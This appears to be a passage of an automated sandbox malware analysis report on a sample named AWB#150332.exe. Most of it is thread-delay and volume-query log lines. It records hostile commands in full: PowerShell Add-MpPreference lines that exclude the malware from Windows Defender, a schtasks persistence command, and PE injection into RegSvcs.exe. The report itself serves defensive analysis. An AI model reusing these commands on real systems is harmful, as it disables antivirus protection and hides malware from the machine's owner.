                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97970Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97699Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97484Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97374Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97266Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97047Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96388Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96171Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95952Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95839Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95617Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95406Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94734Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99319
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99093
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98757
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98652
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98510
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98391
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98139
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97920
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97806
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97029
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96887
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96708
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96571
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95998
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95440
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95202
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95093
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94431
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93760
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93530
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                    Source: RegSvcs.exe, 00000009.00000002.1338206289.00000000061AC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.2479998218.0000000006260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_07305AA0 rdtsc 12_2_07305AA0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe"
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe"
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe"Jump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\AWB#150332.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\AWB#150332.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\AWB#150332.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C6A008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D52008Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeQueries volume information: C:\Users\user\Desktop\AWB#150332.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
